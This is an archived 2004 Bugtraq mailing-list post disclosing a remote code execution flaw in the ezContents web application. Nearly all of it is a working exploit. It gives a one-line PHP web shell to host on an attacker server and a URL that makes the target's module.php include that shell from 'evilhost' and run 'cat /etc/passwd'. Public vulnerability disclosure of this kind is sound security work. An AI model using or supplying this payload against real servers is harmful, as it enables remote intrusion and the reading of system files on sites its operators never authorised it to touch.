lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040110171358.17989.qmail@www.securityfocus.com> Date: 10 Jan 2004 17:13:58 -0000 From: Zero_X www.lobnan.de Team <zero-x@...uxmail.org> To: bugtraq@...urityfocus.com Subject: Remote Code Execution in ezContents Remote Code Execution in ezContents "ezContents" from www.ezcontents.org allows to execute code. Example: Create the following file on your webserver: ----index.php---- <? system($cmd); ?> ----------------- And then type in the following URL: http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd Zero X, member of www.lobnan.de and www.lostkey.org